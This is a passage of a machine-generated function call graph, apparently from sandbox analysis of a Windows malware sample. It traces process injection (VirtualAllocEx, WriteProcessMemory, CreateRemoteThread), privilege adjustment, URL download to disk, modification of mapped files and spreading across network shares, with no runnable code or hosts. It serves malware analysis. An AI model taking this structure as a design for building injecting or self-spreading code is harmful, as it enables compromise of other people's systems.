7671->7665 7672 1436f89 select 7671->7672 7672->7665 7674 1437061 recvfrom 7672->7674 7674->7665 7675 143709a 7674->7675 7675->7665 7676 1435e86 2 API calls 7675->7676 7676->7665 7688 14344cb InterlockedExchange 7677->7688 7679 1436990 7680 1436d75 7679->7680 7681 1436cdf 7679->7681 7687 14369e9 7679->7687 7680->7687 7694 14360d9 7680->7694 7682 1436d3b 7681->7682 7683 1436cec 7681->7683 7686 1434503 InterlockedExchange 7682->7686 7689 1434503 7683->7689 7686->7687 7687->7624 7688->7679 7698 14344cb InterlockedExchange 7689->7698 7691 143450c 7699 14344cb InterlockedExchange 7691->7699 7693 143451a 7693->7687 7695 1436132 7694->7695 7697 14361f2 7695->7697 7700 14344cb InterlockedExchange 7695->7700 7697->7687 7698->7691 7699->7693 7700->7697 7702 1437c98 7701->7702 7704 1437ca1 7701->7704 7703 1437ca8 ioctlsocket 7702->7703 7702->7704 7705 1437cde connect 7703->7705 7704->7636 7704->7637 7706 1437d00 7705->7706 7707 1437d05 WSAGetLastError 7705->7707 7709 1437ec9 ioctlsocket 7706->7709 7708 1437d1d Sleep 7707->7708 7711 1437d27 7707->7711 7708->7705 7709->7704 7712 1437e58 select 7711->7712 7713 1437d35 closesocket 7711->7713 7712->7713 7714 1437e8e 7712->7714 7713->7704 7714->7713 7715 1437e99 __WSAFDIsSet 7714->7715 7715->7713 7716 1437eb0 __WSAFDIsSet 7715->7716 7716->7709 7716->7713 7717->7641 7733 1437fa9 7718->7733 7721 143824d 7723 1438289 7721->7723 7726 143827f closesocket 7721->7726 7722 143824f 7722->7721 7725 1438255 send 7722->7725 7723->7644 7724 1438192 GlobalAlloc 7728 14381c2 7724->7728 7725->7721 7726->7723 7727 14381d7 recv 7727->7728 7730 1438204 7727->7730 7728->7727 7728->7730 7729 1438234 7729->7721 7732 1438240 GlobalFree 7729->7732 7730->7729 7731 1436330 32 API calls 7730->7731 7731->7729 7732->7721 7736 1437fd3 7733->7736 7734 14380e4 7734->7721 7734->7722 7734->7724 7735 14380e6 recv 7735->7734 7736->7734 7736->7735 7737 143809c select 7736->7737 7737->7734 7737->7735 7739 144276d CloseHandle 7738->7739 7740 144255d Process32First 7738->7740 7739->7455 7741 1442591 7740->7741 7742 144266f Process32Next 7740->7742 7741->7742 7744 144259e lstrlen 7741->7744 7742->7739 7743 144268a 7742->7743 7743->7742 7745 1442697 lstrlen 7743->7745 7756 1441ef6 7743->7756 7746 14425b0 lstrcpyn 7744->7746 7747 14425c8 lstrcpy 7744->7747 7748 14426c1 lstrcpy 7745->7748 7749 14426a9 lstrcpyn 7745->7749 7750 14425dc 7 API calls 7746->7750 7747->7750 7751 14426d5 7 API calls 7748->7751 7749->7751 7750->7742 7752 1442659 7750->7752 7751->7743 7753 1441ef6 38 API calls 7752->7753 7754 144266c 7753->7754 7754->7742 7757 1448060 7756->7757 7758 1441f20 OpenProcess 7757->7758 7759 14421a7 OpenProcessToken 7758->7759 7760 1441ffa GetLastError 7758->7760 7761 14421cd GetTokenInformation 7759->7761 7783 1442042 7759->7783 7762 1442009 GetVersionExA 7760->7762 7760->7783 7764 14421f7 GetLastError 7761->7764 7761->7783 7763 144204e GetCurrentThread OpenThreadToken 7762->7763 7762->7783 7765 1442074 GetLastError 7763->7765 7766 14420b3 LookupPrivilegeValueA AdjustTokenPrivileges 7763->7766 7769 144220e GetProcessHeap RtlAllocateHeap 7764->7769 7764->7783 7770 144208d GetCurrentProcess OpenProcessToken 7765->7770 7765->7783 7774 1442105 CloseHandle 7766->7774 7775 144211e GetLastError 7766->7775 7767 14424b4 CloseHandle 7768 14424cb 7767->7768 7771 14424d4 CloseHandle 7768->7771 7772 14424e1 7768->7772 7773 144223f GetTokenInformation 7769->7773 7769->7783 7770->7766 7770->7783 7771->7772 7776 1442500 7772->7776 7777 14424ea GetProcessHeap HeapFree 7772->7777 7778 1442273 LookupAccountSidA 7773->7778 7773->7783 7774->7783 7779 1442144 OpenProcess AdjustTokenPrivileges CloseHandle 7775->7779 7780 144212b CloseHandle 7775->7780 7776->7743 7777->7776 7781 14422c7 7778->7781 7778->7783 7782 1442199 7779->7782 7779->7783 7780->7783 7781->7783 7784 14422d2 lstrcmpiA 7781->7784 7782->7759 7783->7767 7783->7768 7785 1442314 CreateMutexA 7784->7785 7786 14422e8 lstrcmpiA 7784->7786 7785->7783 7786->7785 7787 14422fe lstrcmpiA 7786->7787 7787->7785 7788 144232e VirtualAllocEx 7787->7788 7790 1442366 WriteProcessMemory 7788->7790 7791 14423cd VirtualAllocEx 7788->7791 7790->7783 7792 1442398 CreateRemoteThread 7790->7792 7791->7783 7793 14423fb 7791->7793 7792->7783 7794 14423c6 7792->7794 7795 144240e lstrlen 7793->7795 7794->7791 7800 144772b 7795->7800 7797 144242c WriteProcessMemory 7798 1442457 7797->7798 7799 1442460 CreateRemoteThread 7797->7799 7798->7783 7799->7798 7801 1447734 7800->7801 7801->7797 7801->7801 7803 143811c 39 API calls 7802->7803 7804 14382a3 RtlExitUserThread 7803->7804 7806 1437a1f GlobalFree RtlExitUserThread 7805->7806 7807 14377b5 7805->7807 7807->7806 7808 1437824 7807->7808 7809 14378ff 7807->7809 7811 143784f htons 7808->7811 7810 143790b 7809->7810 7821 143794b 7809->7821 7812 1436981 InterlockedExchange 7810->7812 7813 143719b 38 API calls 7811->7813 7814 143791a 7812->7814 7818 1437875 7813->7818 7819 14378f7 7814->7819 7820 1437926 sendto 7814->7820 7815 1437999 7816 14379a7 7815->7816 7817 14379e4 7815->7817 7822 1436981 InterlockedExchange 7816->7822 7825 1436981 InterlockedExchange 7817->7825 7823 1437895 7818->7823 7824 143787c 7818->7824 7819->7806 7820->7819 7821->7806 7821->7815 7830 1436330 32 API calls 7821->7830 7826 14379b6 7822->7826 7829 1436981 InterlockedExchange 7823->7829 7827 1436981 InterlockedExchange 7824->7827 7828 14379f3 7825->7828 7826->7819 7831 14379c2 sendto 7826->7831 7832 143788d 7827->7832 7828->7806 7833 14379ff sendto 7828->7833 7829->7832 7830->7815 7831->7819 7834 14378d0 7832->7834 7835 14378b0 sendto 7832->7835 7833->7806 7834->7819 7836 14378d6 htons 7834->7836 7835->7834 7837 1435e86 2 API calls 7836->7837 7837->7819 7838->7490 7840 143a277 7839->7840 7841 143a28f SetFileAttributesA DeleteFileA 7839->7841 7846 143e329 7840->7846 7843 143a28d 7841->7843 7843->7501 7845->7505 7847 143e353 7846->7847 7957 14344cb InterlockedExchange 7847->7957 7849 143e456 7958 14344cb InterlockedExchange 7849->7958 7851 143a284 7851->7841 7851->7843 7852 143e714 7853 143e753 RtlEnterCriticalSection 7852->7853 7854 143e71d MultiByteToWideChar 7852->7854 7860 143e778 7853->7860 7855 143e748 7854->7855 7855->7851 7855->7853 7856 143e499 7856->7851 7856->7852 7857 143e6fd 7856->7857 7858 143a26e 6 API calls 7857->7858 7859 143e708 7858->7859 7859->7851 7861 143e7b6 GetLocalTime GetFileAttributesA SetFileAttributesA 7860->7861 7862 143e7f2 CreateFileA 7861->7862 7863 143e7e6 7861->7863 7864 143e832 7862->7864 7865 143e81d GetFileSize 7862->7865 7867 14408de GlobalFree 7863->7867 7868 14408ef RtlLeaveCriticalSection 7863->7868 7866 144088b CloseHandle SetFileAttributesA 7864->7866 7872 143e85f GetFileTime CreateFileMappingA 7864->7872 7865->7864 7869 14408b5 DeleteFileA 7866->7869 7870 14408af 7866->7870 7867->7868 7868->7851 7871 144090a Sleep 7868->7871 7869->7863 7870->7863 7870->7869 7871->7851 7873 143e8c2 MapViewOfFile 7872->7873 7875 143eb53 7872->7875 7873->7875 7886 143e8e4 7873->7886 7874 14407db CloseHandle 7874->7866 7876 14407f5 SetFilePointer SetEndOfFile 7874->7876 7875->7874 7882 14407d1 UnmapViewOfFile 7875->7882 7883 1440793 GlobalAlloc 7875->7883 7885 14405ed 7875->7885 7877 1440852 7876->7877 7878 144082b 7876->7878 7880 1440858 GlobalFree 7877->7880 7881 1440869 SetFileTime 7877->7881 7878->7877 7879 1440831 WriteFile 7878->7879 7879->7877 7880->7881 7881->7866 7882->7874 7883->7885 7884 144077f 7884->7882 7885->7884 7886->7875 7890 143e9ba 7886->7890 7959 14344cb InterlockedExchange 7886->7959 7888 143e997 7888->7890 7960 14344cb InterlockedExchange 7888->7960 7890->7875 7891 143ed26 lstrcpyn lstrcmpiA 7890->7891 7892 143ed5c 7891->7892 7892->7875 7893 143ee9a GlobalAlloc 7892->7893 7895 143eecf 7892->7895 7894 143eecc 7893->7894 7894->7895 7961 14344cb InterlockedExchange 7895->7961 7897 143f925 7899 143f9a1 7897->7899 7903 143cd03 2 API calls 7897->7903 7900 143f9f8 7899->7900 7904 143cd03 2 API calls 7899->7904 8014 14344cb InterlockedExchange 7900->8014 7901 143f306 IsBadWritePtr 7910 143ef48 7901->7910 7936 143f319 7901->7936 7903->7899 7904->7900 7905 143fa0e 7906 143fa55 7905->7906 8015 14344cb InterlockedExchange 7905->8015 8016 14344cb InterlockedExchange 7906->8016 7909 143fa82 7912 143cd03 2 API calls 7909->7912 7913 143fad5 7909->7913 7910->7875 7910->7901 7911 143f39d 7910->7911 7910->7936 7917 143f4ce IsBadWritePtr 7911->7917 7912->7913 7914 143cd03 2 API calls 7913->7914 7915 143fb50 7913->7915 7914->7915 7919 143fb9e 7915->7919 8017 143c76b 7915->8017 7922 143f4e1 7917->7922 7918 143fc7e 8031 14344cb InterlockedExchange 7918->8031 7919->7918 7921 143cd03 2 API calls 7919->7921 7921->7918 7923 143f579 IsBadWritePtr 7922->7923 7929 143f58c 7923->7929 7924 143fd1f 8032 143b3ef 7924->8032 7925 143fc94 7925->7924 7926 143fd5c 7925->7926 7930 143cd03 2 API calls 7925->7930 7926->7875 8058 143d34d 7926->8058 7931 143f5e4 IsBadWritePtr 7929->7931 7930->7924 7932 143f5fc IsBadWritePtr 7931->7932 7931->7936 7932->7936 7945 143f614 7932->7945 7934 143f634 IsBadWritePtr 7934->7936 7937 143f64c IsBadWritePtr 7934->7937 7935 143c89a 2 API calls 7946 143fe88 7935->7946 7936->7897 7962 143cd03 7936->7962 7937->7936 7937->7945 7938 143f705 IsBadWritePtr 7938->7936 7938->7945 7939 143f742 IsBadWritePtr 7939->7936 7939->7945 7940 143f76e lstrcmpiA 7941 143f7cd lstrcmpiA 7940->7941 7940->7945 7942 143f802 lstrcmpiA 7941->7942 7941->7945 7943 143f834 lstrcmpiA 7942->7943 7942->7945 7944 143f875 lstrcmpiA 7943->7944 7943->7945 7944->7945 7945->7934 7945->7936 7945->7938 7945->7939 7945->7940 7945->7941 7945->7942 7945->7943 7945->7944 7946->7875 7947 1436981 InterlockedExchange 7946->7947 7948 14403c7 7947->7948 7949 14404a3 7948->7949 8200 14344cb InterlockedExchange 7949->8200 7951 14404ed GetTickCount 7952 14405c8 7951->7952 7953 144051a 7951->7953 7952->7875 8201 14344cb InterlockedExchange 7953->8201 7955 144051f 7955->7952 8202 14344cb InterlockedExchange 7955->8202 7957->7849 7958->7856 7959->7888 7960->7890 7961->7910 7963 143cd58 7962->7963 7964 143cd47 7962->7964 8215 14344cb InterlockedExchange 7963->8215 8203 143cb12 7964->8203 7967 143cd68 7968 143ce2c 7967->7968 8216 143cc78 7967->8216 7970 143ce62 7968->7970 7972 143cb12 InterlockedExchange 7968->7972 8226 14344cb InterlockedExchange 7970->8226 7972->7970 7975 143d1a7 7975->7897 7976 143cdac 7978 143cdc2 7976->7978 7979 143cdd9 7976->7979 7977 143cb12 InterlockedExchange 7977->7975 8223 14344cb InterlockedExchange 7978->8223 8224 14344cb InterlockedExchange 7979->8224 7980 143ce72 7983 143cc78 InterlockedExchange 7980->7983 8013 143d060 7980->8013 7985 143cea5 7983->7985 7984 143cdc7 8225 14344cb InterlockedExchange 7984->8225 7985->8013 8227 14344cb InterlockedExchange 7985->8227 7988 143ce09 7990 143c76b 2 API calls 7988->7990 7989 143ceca 8228 14344cb InterlockedExchange 7989->8228 7990->7968 7992 143ceea 7993 143cf04 7992->7993 7994 143cf2b 7992->7994 8229 143b354 7993->8229 7996 143c76b 2 API calls 7994->7996 7997 143cf1a 7996->7997 8238 14344cb InterlockedExchange 7997->8238 7999 143cf66 8000 143c76b 2 API calls 7999->8000 8001 143cf78 7999->8001 8000->8001 8002 143cfe8 8001->8002 8003 143cfff 8001->8003 8239 14344cb InterlockedExchange 8002->8239 8240 14344cb InterlockedExchange 8003->8240 8006 143cfed 8007 143c76b 2 API calls 8006->8007 8008 143d037 8007->8008 8009 143d0f1 8008->8009 8010 143d050 8008->8010 8009->8013 8242 14344cb InterlockedExchange 8009->8242 8010->8013 8241 14344cb InterlockedExchange 8010->8241 8013->7975 8013->7977 8014->7905 8015->7905 8016->7909 8018 143b3ef InterlockedExchange 8017->8018 8019 143c78a 8018->8019 8020 143c7cb 8019->8020 8021 143c79b 8019->8021 8023 143c7d1 8020->8023 8024 143c7fe 8020->8024 8249 143b614 8021->8249 8299 143bfb2 8023->8299 8025 143c804 8024->8025 8026 143c82f 8024->8026 8328 143c459 8025->8328 8029 143c7bb 8026->8029 8339 143c61c 8026->8339 8029->7919 8031->7925 8033 143b425 8032->8033 8042 143b41e 8032->8042 8363 14344cb InterlockedExchange 8033->8363 8035 143b431 8036 143b45e 8035->8036 8364 14344cb InterlockedExchange 8035->8364 8372 14344cb InterlockedExchange 8036->8372 8039 143b574 8039->8042 8043 143b59e 8039->8043 8373 14344cb InterlockedExchange 8039->8373 8040 143b44c 8040->8036 8365 14344cb InterlockedExchange 8040->8365 8042->7926 8374 14344cb InterlockedExchange 8043->8374 8044 143b47a 8057 143b4f4 8044->8057 8366 14344cb InterlockedExchange 8044->8366 8049 143b495 8367 14344cb InterlockedExchange 8049->8367 8051 143b4aa 8368 14344cb InterlockedExchange 8051->8368 8053 143b4ee 8053->8057 8370 14344cb InterlockedExchange 8053->8370 8056 143b4bf 8056->8053 8369 14344cb InterlockedExchange 8056->8369 8371 14344cb InterlockedExchange 8057->8371 8059 143d3b6 8058->8059 8062 143d3e7 8059->8062 8375 14344cb InterlockedExchange 8059->8375 8061 143d45c 8376 14344cb InterlockedExchange 8061->8376 8062->8061 8065 143cd03 2 API calls 8062->8065 8064 143d47b 8066 143d4aa 8064->8066 8377 14344cb InterlockedExchange 8064->8377 8065->8062 8068 143c76b 2 API calls 8066->8068 8069 143d4e3 8068->8069 8070 143c76b 2 API calls 8069->8070 8071 143d50b 8070->8071 8378 14344cb InterlockedExchange 8071->8378 8073 143d535 8074 143d564 8073->8074 8379 14344cb InterlockedExchange 8073->8379 8076 143c76b 2 API calls 8074->8076 8077 143d58b 8076->8077 8078 143c76b 2 API calls 8077->8078 8079 143d5c8 8078->8079 8080 143b3ef InterlockedExchange 8079->8080 8081 143d603 8080->8081 8380 14344cb InterlockedExchange 8081->8380 8083 143d613 8084 143b354 2 API calls 8083->8084 8085 143d643 8084->8085 8381 14344cb InterlockedExchange 8085->8381 8087 143d659 8088 143d688 8087->8088 8382 14344cb InterlockedExchange 8087->8382 8089 143c76b 2 API calls 8088->8089 8091 143d6b9 8089->8091 8383 14344cb InterlockedExchange 8091->8383 8093 143d706 8096 143c76b 2 API calls 8093->8096 8095 143d6cf 8095->8093 8384 14344cb InterlockedExchange 8095->8384 8097 143d749 8096->8097 8098 143b3ef InterlockedExchange 8097->8098 8099 143d7b6 8098->8099 8385 143d1b9 8099->8385 8101 143d7dc 8102 143b3ef InterlockedExchange 8101->8102 8103 143d7fc 8102->8103 8104 143c76b 2 API calls 8103->8104 8105 143d824 8104->8105 8106 143b3ef InterlockedExchange 8105->8106 8107 143d87f 8106->8107 8398 14344cb InterlockedExchange 8107->8398 8110 143d8a9 8111 143d8e8 8110->8111 8399 14344cb InterlockedExchange 8110->8399 8112 143c76b 2 API calls 8111->8112 8113 143d925 8112->8113 8400 14344cb InterlockedExchange 8113->8400 8115 143d935 8117 143d974 8115->8117 8401 14344cb InterlockedExchange 8115->8401 8118 143c76b 2 API calls 8117->8118 8119 143d9b7 8118->8119 8120 143b3ef InterlockedExchange 8119->8120 8121 143d9d7 8120->8121 8122 143b3ef InterlockedExchange 8121->8122 8123 143da11 8122->8123 8124 143d1b9 2 API calls 8123->8124 8125 143da37 8124->8125 8126 143b3ef InterlockedExchange 8125->8126 8127 143da57 8126->8127 8128 143d1b9 2 API calls 8127->8128 8129 143da7d 8128->8129 8130 143b3ef InterlockedExchange 8129->8130 8131 143dac3 8130->8131 8132 143c76b 2 API calls 8131->8132 8133 143daeb 8132->8133 8402 14344cb InterlockedExchange 8133->8402 8135 143dafb 8137 143db3a 8135->8137 8403 14344cb InterlockedExchange 8135->8403 8138 143c76b 2 API calls 8137->8138 8139 143db92 8138->8139 8140 143c76b 2 API calls 8139->8140 8141 143dc05 8140->8141 8142 143c76b 2 API calls 8141->8142 8143 143dc2d 8142->8143 8404 14344cb InterlockedExchange 8143->8404 8145 143dc3d 8147 143dc7c 8145->8147 8405 14344cb InterlockedExchange 8145->8405 8148 143c76b 2 API calls 8147->8148 8149 143dcc9 8148->8149 8150 143b3ef InterlockedExchange 8149->8150 8151 143dd36 8150->8151 8152 143d1b9 2 API calls 8151->8152 8153 143dd5c 8152->8153 8154 143b3ef InterlockedExchange 8153->8154 8155 143dd7c 8154->8155 8156 143b3ef InterlockedExchange 8155->8156 8157 143ddd2 8156->8157 8158 143b3ef InterlockedExchange 8157->8158 8159 143de2d 8158->8159 8160 143c76b 2 API calls 8159->8160 8161 143de8b 8160->8161 8162 143c76b 2 API calls 8161->8162 8163 143deb3 8162->8163 8406 14344cb InterlockedExchange 8163->8406 8166 143dec3 8167 143df0a 8166->8167 8407 14344cb InterlockedExchange 8166->8407 8168 143c76b 2 API calls 8167->8168 8169 143df61 8168->8169 8170 143b3ef InterlockedExchange 8169->8170 8171 143df81 8170->8171 8172 143b3ef InterlockedExchange 8171->8172 8173 143dfee 8172->8173 8174 143d1b9 2 API calls 8173->8174 8175 143e014 8174->8175 8176 143b3ef InterlockedExchange 8175->8176 8177 143e034 8176->8177 8178 143c76b 2 API calls 8177->8178 8179 143e05a 8178->8179 8180 143c76b 2 API calls 8179->8180 8181 143e082 8180->8181 8408 14344cb InterlockedExchange 8181->8408 8183 143e0cd 8185 143e114 8183->8185 8409 14344cb InterlockedExchange 8183->8409 8186 143c76b 2 API calls 8185->8186 8187 143e16b 8186->8187 8188 143c76b 2 API calls 8187->8188 8189 143e193 8188->8189 8190 143c76b 2 API calls 8189->8190 8191 143e1bb 8190->8191 8192 143c76b 2 API calls 8191->8192 8193 143e1e1 8192->8193 8194 143c76b 2 API calls 8193->8194 8195 143e20a 8194->8195 8196 143c76b 2 API calls 8195->8196 8197 143e28f 8196->8197 8198 143c76b 2 API calls 8197->8198 8199 143e2c4 8198->8199 8199->7875 8199->7935 8200->7951 8201->7955 8202->7955 8204 143b3ef InterlockedExchange 8203->8204 8205 143cb4b 8204->8205 8243 14344cb InterlockedExchange 8205->8243 8207 143cb5f 8208 143cc4b 8207->8208 8244 14344cb InterlockedExchange 8207->8244 8210 143b3ef InterlockedExchange 8208->8210 8211 143cc62 8210->8211 8211->7963 8212 14344cb InterlockedExchange 8214 143cb7a 8212->8214 8213 1434503 InterlockedExchange 8213->8214 8214->8208 8214->8212 8214->8213 8215->7967 8217 143cc92 8216->8217 8220 143ccf8 8216->8220 8217->8220 8245 14344cb InterlockedExchange 8217->8245 8219 143ccc0 8219->8220 8246 14344cb InterlockedExchange 8219->8246 8220->7968 8222 14344cb InterlockedExchange 8220->8222 8222->7976 8223->7984 8224->7984 8225->7988 8226->7980 8227->7989 8228->7992 8247 14344cb InterlockedExchange 8229->8247 8231 143b366 8248 14344cb InterlockedExchange 8231->8248 8233 143b37b 8234 143b38d GetTickCount 8233->8234 8235 143b39c 8233->8235 8234->8235 8236 143c76b InterlockedExchange 8235->8236 8237 143b3b7 8236->8237 8237->7997 8238->7999 8239->8006 8240->8006 8241->8013 8242->8013 8243->8207 8244->8214 8245->8219 8246->8219 8247->8231 8248->8233 8250 143b64a 8249->8250 8251 143b3ef InterlockedExchange 8250->8251 8252 143b67b 8251->8252 8344 14344cb InterlockedExchange 8252->8344 8255 143ba0a 8257 143b3ef InterlockedExchange 8255->8257 8256 14344cb InterlockedExchange 8298 143b68b 8256->8298 8258 143ba31 8257->8258 8259 143ba46 8258->8259 8262 143be04 8258->8262 8348 14344cb InterlockedExchange 8259->8348 8261 143ba4b 8264 143bd22 8261->8264 8265 143bb06 8261->8265 8266 143ba75 8261->8266 8281 143bcb3 8261->8281 8295 143badc 8261->8295 8262->8295 8354 14344cb InterlockedExchange 8262->8354 8263 143b913 8263->8255 8346 14344cb InterlockedExchange 8263->8346 8270 143bd28 8264->8270 8271 143bd5f 8264->8271 8267 143b354 2 API calls 8265->8267 8278 143b3ef InterlockedExchange 8266->8278 8272 143bb1a 8267->8272 8268 143bf63 8268->8029 8275 143bfb2 2 API calls 8270->8275 8276 143bd68 8271->8276 8277 143bd7f 8271->8277 8279 143b3ef InterlockedExchange 8272->8279 8273 143b3ef InterlockedExchange 8273->8268 8275->8295 8352 14344cb InterlockedExchange 8276->8352 8353 14344cb InterlockedExchange 8277->8353 8278->8295 8284 143bb3a 8279->8284 8280 143b995 8293 143b9d5 8280->8293 8347 14344cb InterlockedExchange 8280->8347 8281->8295 8351 14344cb InterlockedExchange 8281->8351 8288 143bb85 8284->8288 8289 143bb4b 8284->8289 8286 143bd6d 8297 143b3ef InterlockedExchange 8286->8297 8287 143b75e 8345 14344cb InterlockedExchange 8287->8345 8350 14344cb InterlockedExchange 8288->8350 8349 14344cb InterlockedExchange 8289->8349 8290 1434503 InterlockedExchange 8290->8298 8296 143b614 2 API calls 8293->8296 8295->8268 8295->8273 8296->8255 8297->8295 8298->8256 8298->8287 8298->8290 8300 143b3ef InterlockedExchange 8299->8300 8301 143bffe 8300->8301 8355 14344cb InterlockedExchange 8301->8355 8303 143b3ef InterlockedExchange 8304 143c136 8303->8304 8311 143c1b8 8304->8311 8358 14344cb InterlockedExchange 8304->8358 8306 143c00e 8327 143c10f 8306->8327 8356 14344cb InterlockedExchange 8306->8356 8307 143c18a 8309 143c2a3 8307->8309 8310 143c1f2 8307->8310 8307->8311 8312 143b354 2 API calls 8309->8312 8317 143b3ef InterlockedExchange 8310->8317 8313 143b3ef InterlockedExchange 8311->8313 8318 143c40e 8311->8318 8314 143c2b7 8312->8314 8313->8318 8319 143b3ef InterlockedExchange 8314->8319 8315 143c092 8321 143c0da 8315->8321 8357 14344cb InterlockedExchange 8315->8357 8317->8311 8318->8029 8320 143c2d7 8319->8320 8322 143c322 8320->8322 8323 143c2e8 8320->8323 8324 143bfb2 2 API calls 8321->8324 8360 14344cb InterlockedExchange 8322->8360 8359 14344cb InterlockedExchange 8323->8359 8324->8327 8327->8303 8329 143b3ef InterlockedExchange 8328->8329 8330 143c490 8329->8330 8338 143c4bc 8330->8338 8361 14344cb InterlockedExchange 8330->8361 8332 143c4aa 8333 143b354 2 API calls 8332->8333 8332->8338 8335 143c4f6 8333->8335 8334 143c60a 8334->8029 8362 14344cb InterlockedExchange 8335->8362 8337 143b3ef InterlockedExchange 8337->8334 8338->8334 8338->8337 8340 143b3ef InterlockedExchange 8339->8340 8341 143c653 8340->8341 8342 143b3ef InterlockedExchange 8341->8342 8343 143c759 8341->8343 8342->8343 8343->8029 8344->8298 8345->8263 8346->8280 8347->8280 8348->8261 8349->8295 8350->8295 8351->8295 8352->8286 8353->8286 8354->8295 8355->8306 8356->8315 8357->8315 8358->8307 8359->8311 8360->8311 8361->8332 8362->8338 8363->8035 8364->8040 8365->8044 8366->8049 8367->8051 8368->8056 8369->8056 8370->8057 8371->8036 8372->8039 8373->8043 8374->8042 8375->8059 8376->8064 8377->8064 8378->8073 8379->8073 8380->8083 8381->8087 8382->8087 8383->8095 8384->8095 8386 143d1f4 8385->8386 8387 143d346 8386->8387 8388 143d20e 8386->8388 8410 14344cb InterlockedExchange 8386->8410 8387->8101 8411 14344cb InterlockedExchange 8388->8411 8391 143d273 8393 143c76b 2 API calls 8391->8393 8395 143d298 8391->8395 8392 143d232 8392->8391 8412 14344cb InterlockedExchange 8392->8412 8393->8395 8396 143b3ef InterlockedExchange 8395->8396 8397 143d336 8396->8397 8397->8101 8398->8110 8399->8110 8400->8115 8401->8115 8402->8135 8403->8135 8404->8145 8405->8145 8406->8166 8407->8166 8408->8183 8409->8183 8410->8388 8411->8392 8412->8391 8413->7509 8415 143a7a9 lstrcat 8414->8415 8416 143a7b8 8414->8416 8415->8416 8466 143a16b 8416->8466 8418 143a7c4 lstrcpy 8471 14344cb InterlockedExchange 8418->8471 8420 143a7da 8421 143a814 lstrlen wsprintfA 8420->8421 8422 143a7ec lstrlen wsprintfA 8420->8422 8423 143a83b 8421->8423 8422->8423 8423->7513 8474 143a677 8424->8474 8427 1440b8f 8427->7513 8428 1440a0a InternetOpenA 8429 1440a31 InternetOpenUrlA 8428->8429 8430 1440b63 8428->8430 8429->8430 8431 1440a63 8429->8431 8432 1440b6c InternetCloseHandle 8430->8432 8433 1440b79 8430->8433 8434 1440a69 CreateFileA 8431->8434 8435 1440a8b InternetReadFile 8431->8435 8432->8433 8433->8427 8436 1440b82 InternetCloseHandle 8433->8436 8434->8435 8440 1440ab3 8435->8440 8436->8427 8437 1440b56 CloseHandle 8437->8430 8438 1440acf WriteFile 8438->8440 8439 1440b15 8439->8437 8440->8435 8440->8437 8440->8438 8440->8439 8442 1441536 GlobalAlloc ReadFile lstrlen 8441->8442 8443 144152f 8441->8443 8444 1441587 8442->8444 8443->7513 8445 1441730 8444->8445 8446 144159d lstrlen 8444->8446 8445->8443 8447 1441736 GlobalFree 8445->8447 8448 14415c4 8446->8448 8447->8443 8448->8445 8449 1441641 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 8448->8449 8450 14415fe lstrlen 8448->8450 8451 14416c4 8449->8451 8452 14416b8 8449->8452 8450->8448 8454 14416d4 DeleteFileA 8451->8454 8455 14416ca GlobalFree 8451->8455 8452->8451 8453 14416e5 8452->8453 8456 1434631 3 API calls 8453->8456 8454->8443 8455->8454 8457 14416ee Sleep CreateThread 8456->8457 8458 14341c6 3 API calls 8457->8458 8486 143a1f2 lstrcpy 8457->8486 8459 1441722 Sleep 8458->8459 8459->8445 8461 143460b WriteFile CloseHandle 8460->8461 8462 143462d 8460->8462 8461->8462 8462->7521 8464 143470c CreateProcessA 8463->8464 8464->7524 8472 14344cb InterlockedExchange 8466->8472 8468 143a1dd lstrcpy 8468->8418 8470 143a192 8470->8468 8473 14344cb InterlockedExchange 8470->8473 8471->8420 8472->8470 8473->8470 8476 143a68a 8474->8476 8475 143a757 8475->8427 8475->8428 8476->8475 8477 143a6b0 8476->8477 8478 143a6c5 GetTickCount 8477->8478 8479 143a70f GetTickCount 8477->8479 8484 14344cb InterlockedExchange 8478->8484 8485 14344cb InterlockedExchange 8479->8485 8482 143a6d2 GetTickCount lstrlen wsprintfA 8482->8475 8483 143a71c GetTickCount lstrlen wsprintfA 8483->8475 8484->8482 8485->8483 8487 143a226 8486->8487 8488 143a22f GetFileAttributesA 8487->8488 8489 143a25d RtlExitUserThread 8487->8489 8490 143a243 DeleteFileA Sleep 8488->8490 8491 143a241 8488->8491 8490->8487 8491->8489 8493 1448060 8492->8493 8494 1443787 GlobalAlloc 8493->8494 8495 144381f 8494->8495 8540 1442fff 8495->8540 8497 143e329 48 API calls 8498 144382e 8497->8498 8498->8497 8499 144384d Sleep 8498->8499 8500 144385a 8498->8500 8499->8498 8502 14438a2 8500->8502 8545 14344cb InterlockedExchange 8500->8545 8502->7536 8504 144192e 8503->8504 8510 1441828 8503->8510 8504->7548 8505 1441843 RegEnumValueA 8506 144191a RegCloseKey 8505->8506 8505->8510 8506->8504 8508 14418bd lstrlen lstrlen 8508->8510 8509 143e329 48 API calls 8511 144190a Sleep 8509->8511 8510->8505 8510->8508 8510->8509 8511->8510 8513 1441a42 GlobalAlloc 8512->8513 8515 1441a26 8512->8515 8520 1441a5a 8513->8520 8514 1441c9d GlobalFree WNetCloseEnum 8514->8515 8515->7550 8516 1441a79 WNetEnumResourceA 8517 1441c7e GetLastError 8516->8517 8516->8520 8518 1441c8d Sleep 8517->8518 8519 1441c8b 8517->8519 8518->8520 8519->8514 8520->8514 8520->8516 8520->8518 8521 1441acf 8520->8521 8522 1441c77 8521->8522 8523 1441b14 lstrcpy lstrcat 8521->8523 8524 1441c51 8521->8524 8522->7550 8526 1440b9a 7 API calls 8523->8526 8525 144195d 103 API calls 8524->8525 8527 1441c69 Sleep 8525->8527 8528 1441b47 8526->8528 8527->8522 8528->8524 8529 1441b6b lstrcpy lstrlen 8528->8529 8533 1441be3 8528->8533 8530 1441b96 lstrcat 8529->8530 8531 1441ba8 lstrlen 8529->8531 8530->8531 8532 143a16b 2 API calls 8531->8532 8535 1441bc2 lstrcat 8532->8535 8536 1441c0f lstrlen 8533->8536 8539 1441c38 8533->8539 8534 1441c44 DeleteFileA 8534->8524 8546 1440c4b 8535->8546 8552 1441060 Sleep 8536->8552 8539->8524 8539->8534 8541 143a75a 10 API calls 8540->8541 8542 1443015 CreateFileA 8541->8542 8543 144305e 8542->8543 8544 144303a WriteFile CloseHandle 8542->8544 8543->8498 8544->8543 8545->8500 8547 1440c6a lstrlen 8546->8547 8548 1440c8d CreateFileA 8547->8548 8549 1440c61 8547->8549 8550 1440c87 8548->8550 8551 1440caf WriteFile CloseHandle GetFileAttributesA 8548->8551 8549->8547 8549->8550 8550->8533 8551->8550 8553 14410d4 lstrcat 8552->8553 8554 14410ec 8552->8554 8553->8554 8555 1441117 lstrcat FindFirstFileA 8554->8555 8556 1441101 8554->8556 8557 1441141 